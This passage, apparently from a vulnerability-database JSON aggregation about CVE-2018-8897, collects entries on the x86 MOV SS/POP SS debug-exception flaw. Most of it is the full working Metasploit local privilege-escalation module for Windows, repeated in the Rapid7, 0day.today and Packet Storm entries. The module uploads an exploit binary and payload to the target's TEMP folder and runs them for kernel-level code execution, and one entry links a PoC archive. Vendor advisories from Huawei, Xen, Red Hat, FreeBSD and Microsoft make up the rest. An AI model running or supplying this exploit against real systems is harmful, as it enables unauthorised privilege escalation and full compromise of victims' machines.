def exploit_dll\n begin\n 
print_status('Checking target...')\n validate_active_host\n validate_target\n print_status('Target Looks Good... trying to start notepad')\n process = setup_process\n inject_magic(process)\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(e.message)\n end\n end\n\n def exploit_exe\n begin\n validate_remote_path(temp_path)\n ensure_clean_exploit_destination\n ensure_clean_payload_destination\n upload_exploit\n upload_payload\n execute_exploit\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(e.message)\n ensure_clean_exploit_destination\n ensure_clean_payload_destination\n end\n end\n\n def exploit\n begin\n validate_active_host\n validate_target\n if datastore['USE_INJECTION']\n exploit_dll\n else\n exploit_exe\n end\n end\n end\n\n attr_reader :exploit_name\n attr_reader :payload_name\n attr_reader :payload_exe\n attr_reader :temp_path\n attr_reader :payload_path\n attr_reader :exploit_path\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/mov_ss.rb"}], "zdt": [{"lastseen": "2018-07-13T21:54:00", "description": "This Metasploit module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS. 
This Metasploit module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution.", "edition": 1, "published": "2018-07-13T00:00:00", "title": "Microsoft Windows #MicrosoftWindows POP/MOV SS Local Privilege Elevation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "1337DAY-ID-30720", "href": "https://0day.today/exploit/description/30720", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in a statement in the system programming guide\r\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\r\n in various operating system kerneles, resulting in unexpected behavior for #DB\r\n excpetions that are deferred by MOV SS or POP SS.\r\n\r\n This module will upload the pre-compiled exploit and use it to execute the final\r\n payload in order to gain remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nick Peterson', # Original discovery (@nickeverdox)\r\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\r\n 'Can B\u00f6l\u00fck <can1357>', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' 
=>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 08 2018',\r\n 'References' =>\r\n [\r\n ['CVE', '2018-8897'],\r\n ['EDB', '44697'],\r\n ['BID', '104071'],\r\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\r\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'False'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('PATH',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [false, 'The number of seconds to delay before executing the exploit', 3])\r\n ])\r\n end\r\n\r\n def setup\r\n super\r\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\r\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\r\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\r\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n @payload_exe = generate_payload_exe\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n host = session.session_host\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def 
validate_remote_path(path)\r\n unless directory?(path)\r\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n if sysinfo['OS'] =~ /XP/\r\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n if file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\n end\r\n\r\n def ensure_clean_exploit_destination\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def ensure_clean_payload_destination\r\n ensure_clean_destination(payload_path)\r\n end\r\n\r\n def upload_exploit\r\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')\r\n upload_file(exploit_path, local_exploit_path)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n end\r\n\r\n def upload_payload\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n end\r\n\r\n def execute_exploit\r\n sleep(datastore['EXECUTE_DELAY'])\r\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\r\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\r\n vprint_status(output)\r\n end\r\n\r\n def exploit\r\n begin\r\n validate_active_host\r\n validate_target\r\n validate_remote_path(temp_path)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n upload_exploit\r\n upload_payload\r\n execute_exploit\r\n rescue 
Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(e.message)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n end\r\n end\r\n\r\n attr_reader :exploit_name\r\n attr_reader :payload_name\r\n attr_reader :payload_exe\r\n attr_reader :temp_path\r\n attr_reader :payload_path\r\n attr_reader :exploit_path\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30720"}, {"lastseen": "2018-05-23T02:47:23", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2018-05-23T00:00:00", "title": "Microsoft Windows - POP/MOV SS Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-23T00:00:00", "id": "1337DAY-ID-30427", "href": "https://0day.today/exploit/description/30427", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\r\n \r\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\r\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip\n\n# 0day.today [2018-05-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30427"}], "huawei": [{"lastseen": "2020-09-10T06:41:01", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by 
MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, some Xen configurations, or FreeBSD, or a Linux kernel. Some Huawei products are also affected by this vulnerability. An attacker may exploit this vulnerability to escalate their privileges. (Vulnerability ID: HWPSIRT-2018-05100)\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-8897.\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181010-01-debug-en", "edition": 1, "modified": "2020-09-09T00:00:00", "published": "2019-09-21T00:00:00", "id": "HUAWEI-SA-20181010-01-DEBUG", "href": "https://www.huawei.com/en/psirt/security-advisories/2018/huawei-sa-20181010-01-debug-en", "title": "Security Advisory - Privilege Escalation Vulnerability in Some Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-21T10:34:57", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "", "edition": 1, "modified": "2019-09-21T00:00:00", "published": "2019-09-21T00:00:00", "id": "HUAWEI-SA-20190921-01-DEBUG", "href": "https://www.huawei.com/en/psirt/security-advisories/2019/huawei-sa-20190921-01-debug-en", "title": "Security Advisory - Privilege Escalation Vulnerability in Some Huawei 
Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "xen": [{"lastseen": "2018-05-08T23:14:09", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "#### ISSUE DESCRIPTION\nWhen switching stacks, it is critical to have a matching stack segment and stack pointer. To allow an atomic update from what would otherwise be two adjacent instructions, an update which changes the stack segment (either a mov or pop instruction with %ss encoded as the destination register) sets the movss shadow for one instruction.\nThe exact behaviour of the movss shadow is poorly understood.\nIn practice, a movss shadow delays some debug exceptions (e.g. from a hardware breakpoint) until the subsequent instruction has completed. If the subsequent instruction normally transitions to supervisor mode (e.g. a system call), then the debug exception will be taken after the transition to ring0 is completed.\nFor most transitions to supervisor mode, this only confuses Xen into printing a lot of debugging information. For the syscall instruction however, the exception gets taken before the syscall handler can move off the guest stack.\n#### IMPACT\nA malicious PV guest can escalate their privilege to that of the hypervisor.\n#### VULNERABLE SYSTEMS\nAll versions of Xen are vulnerable.\nOnly x86 systems are vulnerable. ARM systems are not vulnerable.\nOnly x86 PV guests can exploit the vulnerability. 
x86 HVM and PVH guests cannot exploit the vulnerability.\nAn attacker needs to be able to control hardware debugging facilities to exploit the vulnerability, but such permissions are typically available to unprivileged users.\n", "edition": 1, "modified": "2018-05-08T16:45:00", "published": "2018-05-08T16:45:00", "id": "XSA-260", "href": "http://xenbits.xen.org/xsa/advisory-260.html", "title": "x86: mishandling of debug exceptions", "type": "xen", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-07-14T02:42:05", "description": "", "published": "2018-07-13T00:00:00", "type": "packetstorm", "title": "Microsoft Windows POP/MOV SS Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "PACKETSTORM:148549", "href": "https://packetstormsecurity.com/files/148549/Microsoft-Windows-POP-MOV-SS-Local-Privilege-Elevation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/common' \nrequire 'msf/core/post/file' \nrequire 'msf/core/post/windows/priv' \nrequire 'msf/core/post/windows/registry' \nrequire 'msf/core/exploit/exe' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Common \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in a statement in the system programming guide \nof the Intel 64 and IA-32 architectures software developer's manual being mishandled \nin various operating system kerneles, resulting in unexpected behavior for #DB \nexcpetions that are deferred by MOV SS or POP SS. 
\n \nThis module will upload the pre-compiled exploit and use it to execute the final \npayload in order to gain remote code execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nick Peterson', # Original discovery (@nickeverdox) \n'Nemanja Mulasmajic', # Original discovery (@0xNemi) \n'Can B\u00f6l\u00fck <can1357>', # PoC \n'bwatters-r7' # msf module \n], \n'Platform' => [ 'win' ], \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 08 2018', \n'References' => \n[ \n['CVE', '2018-8897'], \n['EDB', '44697'], \n['BID', '104071'], \n['URL', 'https://github.com/can1357/CVE-2018-8897/'], \n['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/'] \n], \n'DefaultOptions' => \n{ \n'DisablePayloadHandler' => 'False' \n} \n)) \n \nregister_options([ \nOptString.new('EXPLOIT_NAME', \n[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), \nOptString.new('PAYLOAD_NAME', \n[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), \nOptString.new('PATH', \n[false, 'Path to write binaries (%TEMP% by default).', nil]), \nOptInt.new('EXECUTE_DELAY', \n[false, 'The number of seconds to delay before executing the exploit', 3]) \n]) \nend \n \ndef setup \nsuper \n@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) \n@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) \n@exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i) \n@payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i) \n@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') \n@payload_path = \"#{temp_path}\\\\#{payload_name}\" \n@exploit_path = \"#{temp_path}\\\\#{exploit_name}\" \n@payload_exe = generate_payload_exe \nend \n \ndef validate_active_host \nbegin \nhost = 
session.session_host \nprint_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nraise Msf::Exploit::Failed, 'Could not connect to session' \nend \nend \n \ndef validate_remote_path(path) \nunless directory?(path) \nfail_with(Failure::Unreachable, \"#{path} does not exist on the target\") \nend \nend \n \ndef validate_target \nif sysinfo['Architecture'] == ARCH_X86 \nfail_with(Failure::NoTarget, 'Exploit code is 64-bit only') \nend \nif sysinfo['OS'] =~ /XP/ \nfail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') \nend \nend \n \ndef ensure_clean_destination(path) \nif file?(path) \nprint_status(\"#{path} already exists on the target. Deleting...\") \nbegin \nfile_rm(path) \nprint_status(\"Deleted #{path}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(\"Unable to delete #{path}\") \nend \nend \nend \n \ndef ensure_clean_exploit_destination \nensure_clean_destination(exploit_path) \nend \n \ndef ensure_clean_payload_destination \nensure_clean_destination(payload_path) \nend \n \ndef upload_exploit \nlocal_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe') \nupload_file(exploit_path, local_exploit_path) \nprint_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\") \nend \n \ndef upload_payload \nwrite_file(payload_path, payload_exe) \nprint_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\") \nend \n \ndef execute_exploit \nsleep(datastore['EXECUTE_DELAY']) \nprint_status(\"Running exploit #{exploit_path} with payload #{payload_path}\") \noutput = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\") \nvprint_status(output) \nend \n \ndef exploit \nbegin 
\nvalidate_active_host \nvalidate_target \nvalidate_remote_path(temp_path) \nensure_clean_exploit_destination \nensure_clean_payload_destination \nupload_exploit \nupload_payload \nexecute_exploit \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(e.message) \nensure_clean_exploit_destination \nensure_clean_payload_destination \nend \nend \n \nattr_reader :exploit_name \nattr_reader :payload_name \nattr_reader :payload_exe \nattr_reader :temp_path \nattr_reader :payload_path \nattr_reader :exploit_path \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148549/mov_ss.rb.txt"}], "redhat": [{"lastseen": "2019-08-13T18:47:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.", "modified": "2018-05-09T02:06:26", "published": "2018-05-09T01:59:05", "id": "RHSA-2018:1352", "href": "https://access.redhat.com/errata/RHSA-2018:1352", "type": "redhat", "title": "(RHSA-2018:1352) Moderate: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), 
including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.", "modified": "2018-05-09T02:05:54", "published": "2018-05-09T01:59:19", "id": "RHSA-2018:1353", "href": "https://access.redhat.com/errata/RHSA-2018:1353", "type": "redhat", "title": "(RHSA-2018:1353) Moderate: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. 
(BZ#1554256)", "modified": "2018-05-10T22:10:56", "published": "2018-05-09T01:08:05", "id": "RHSA-2018:1350", "href": "https://access.redhat.com/errata/RHSA-2018:1350", "type": "redhat", "title": "(RHSA-2018:1350) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* If an NFSv3 client mounted a subdirectory of an exported file system, a directory entry to the mount hosting the export was incorrectly held even after clearing the cache. Consequently, attempts to unmount the subdirectory with the umount command failed with the EBUSY error. With this update, the underlying source code has been fixed, and the unmount operation now succeeds as expected in the described situation. (BZ#1538588)\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. 
(BZ#1554254)", "modified": "2018-05-10T22:11:42", "published": "2018-05-09T01:14:35", "id": "RHSA-2018:1351", "href": "https://access.redhat.com/errata/RHSA-2018:1351", "type": "redhat", "title": "(RHSA-2018:1351) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.\n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. 
(BZ#1554251)", "modified": "2018-05-10T22:10:34", "published": "2018-05-09T00:59:57", "id": "RHSA-2018:1349", "href": "https://access.redhat.com/errata/RHSA-2018:1349", "type": "redhat", "title": "(RHSA-2018:1349) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:31:56", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "\nProblem Description:\nThe MOV SS and POP SS instructions inhibit debug exceptions\n\tuntil the instruction boundary following the next instruction.\n\tIf that instruction is a system call or similar instruction\n\tthat transfers control to the operating system, the debug\n\texception will be handled in the kernel context instead of\n\tthe user context.\nImpact:\nAn authenticated local attacker may be able to read\n\tsensitive data in kernel memory, control low-level operating\n\tsystem functions, or may panic the system.\n", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "521CE804-52FD-11E8-9123-A4BADB2F4699", "href": "https://vuxml.freebsd.org/freebsd/521ce804-52fd-11e8-9123-a4badb2f4699.html", "title": "FreeBSD -- Mishandling of x86 debug exceptions", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:44:20", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-8174", "CVE-2018-8897"], "description": "<html><body><p>Resolves vulnerabilities in Windows Server 2008, Windows Embedded POSReady 2009, and Windows Embedded Standard 2009.</p><h2>Summary</h2><div class=\"kb-summary-section section\"><p>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory.<br/>A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory.\u00a0<br/><br/>To learn more about the vulnerabilities, go to the following Common 
Vulnerabilities and Exposures (CVE).</p><ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174\" id=\"kb-link-2\" target=\"_self\">CVE-2018-8174</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8897\" id=\"kb-link-2\" target=\"_self\">CVE-2018-8897</a></li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><strong>Important\u00a0</strong>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"> <h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>. </div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4134651\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. 
<br/></div></div><h2>Deployment information</h2>For deployment details for this security update, go to the following article in the Microsoft Knowledge Base:<br/> <div class=\"indent\"> <a href=\"https://support.microsoft.com/en-us/help/20180508\" id=\"kb-link-9\">Security update deployment information: May 08, 2018</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></td></tr></tbody></table><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 
hash</th></tr><tr><td>Windows6.0-KB4134651-ia64.msu</td><td>FCFD12B7D19CCEF827F086FB3D5BCD961723363E</td><td>3E8EC96351AA00649BB98A8A72C5E8AEAE5EBC4E9E3E62A8E7D447F7C039D075</td></tr><tr><td>Windows6.0-KB4134651-x86.msu</td><td>C3102BEDCA9F6D9C1EA29732F8B2D832355E01E9</td><td>C307567AEFACA32665DF458BEE9A10D5541D03644CAF8A3C0C636184EAB4A751</td></tr><tr><td>Windows6.0-KB4134651-x64.msu</td><td>55BD8538E452DB8FD330A88666E13151F5DE8334</td><td>14F8A210905C5F2CB1712F2C7E61F45294879E9661CDCE7BDCDA64D48DD5197A</td></tr><tr><td>WindowsXP-KB4134651-x86-Embedded-ENU.exe</td><td>BA2C6637491967E459B9F24B9939618DBCDC8978</td><td>7BD6C9443E70DE7FBB66E83B38032A0222E94E1AADDC6056D135C2C4FEBB77FE</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>File information</strong><br/><br/><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
